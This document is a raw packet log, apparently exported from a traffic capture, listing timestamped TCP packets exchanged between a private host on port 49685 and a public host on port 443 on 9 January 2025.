                                            Jan 9, 2025 04:28:39.040345907 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040404081 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040572882 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040604115 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040617943 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040622950 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040631056 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040648937 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040671110 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040676117 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040719032 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.043781996 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.043828011 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.043997049 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044043064 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044101954 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044138908 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044146061 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044162989 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044189930 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044209957 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044421911 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044457912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044466019 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044470072 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044496059 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044512033 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044559956 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044605970 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044699907 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044749022 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.044826984 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.044883013 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045067072 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045130968 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045156956 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045188904 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045202017 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045206070 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045309067 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045365095 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045409918 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045475960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045520067 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045655966 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045686007 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045697927 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045702934 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.045732021 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045747995 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.045969963 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.046020031 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.127463102 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.127533913 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.127561092 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.127612114 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.127743006 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.127779007 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.127960920 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.127995968 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.127998114 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128005028 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128031015 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128031969 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128040075 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128077984 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128376007 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128411055 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128415108 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128418922 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128446102 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128773928 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.128813028 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.128993988 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129029036 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129030943 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129035950 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129060984 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129074097 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129076958 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129087925 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129102945 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129112959 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129143953 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129148960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129182100 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129777908 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129818916 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129818916 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129827023 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129853010 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129858971 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129894972 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129900932 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129936934 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129951954 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129956007 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.129971027 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.129972935 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130006075 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130009890 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130042076 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130064964 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130573988 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130616903 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130620003 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130626917 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130650043 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130651951 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130666971 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130671024 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.130695105 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.130723000 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.131031990 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.131078005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.131078959 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.131086111 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.131112099 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.131129980 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.251724005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.251784086 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.251852036 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.251880884 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.251939058 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252012014 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252012014 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252012014 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252022028 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252106905 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252149105 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252156019 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252188921 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252299070 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252335072 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252340078 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252345085 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252370119 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252387047 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252568960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252610922 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252626896 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252662897 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.252662897 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252672911 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.252698898 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253123999 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253159046 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253185034 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253189087 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253196955 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253204107 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253223896 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253595114 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253624916 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253638029 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253642082 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.253660917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253676891 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.253984928 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254024982 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254031897 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254060984 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254071951 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254076004 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254093885 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254096031 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254108906 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254112005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254134893 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254163027 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254828930 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254863977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254873037 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254877090 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254900932 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254909039 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254913092 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254935980 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254937887 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254955053 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.254957914 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254968882 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.254981995 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255002975 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255009890 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255014896 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255039930 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255057096 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255455971 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255500078 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255624056 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255661964 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255665064 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255669117 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255692959 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255698919 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255707979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.255712032 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.255740881 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256021023 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256064892 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256089926 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256119967 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256129026 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256133080 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256150007 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256150961 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256165981 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256170034 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.256195068 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.256220102 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338716030 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338789940 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338871002 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338918924 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.338921070 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338931084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.338965893 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339129925 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339155912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339190006 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339200020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339222908 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339236021 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339462996 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339494944 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339514017 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339519978 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339546919 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339565039 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339719057 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339766979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.339946985 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.339997053 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340193987 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340225935 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340245962 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340250969 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340261936 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340282917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340287924 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340306997 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340312958 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340326071 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340351105 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340907097 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340938091 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340949059 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340965033 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340981960 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.340986967 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.340998888 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341006994 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341036081 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341041088 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341094971 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341578960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341615915 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341629982 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341634035 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341650963 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341662884 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341681004 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341684103 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341692924 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.341713905 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.341747999 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342061043 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342093945 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342118979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342123985 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342139006 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342166901 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342231035 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342263937 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342291117 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342294931 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342299938 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342323065 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342325926 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342349052 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342372894 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.342376947 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.342422009 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.343230009 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343266010 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343280077 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.343285084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343297005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343317986 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.343327045 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343341112 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.343346119 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.343380928 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.343395948 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467142105 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467190027 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467216969 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467242002 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467262983 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467278957 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467281103 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467291117 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467330933 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467411041 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467463017 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467533112 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467588902 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467766047 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467812061 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467816114 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467833042 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467865944 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.467947006 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.467999935 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468075991 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468117952 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468343973 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468384981 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468394995 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468399048 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468430996 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468452930 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468498945 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468664885 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468710899 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468889952 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468923092 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468935966 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468940020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468957901 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.468965054 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468983889 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.468991995 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469010115 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469039917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469181061 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469235897 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469356060 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469391108 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469409943 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469414949 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469438076 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469456911 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469602108 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469640017 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469650984 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469656944 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.469682932 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469701052 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.469978094 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.470016956 CET4434968559.110.190.44192.168.2.7
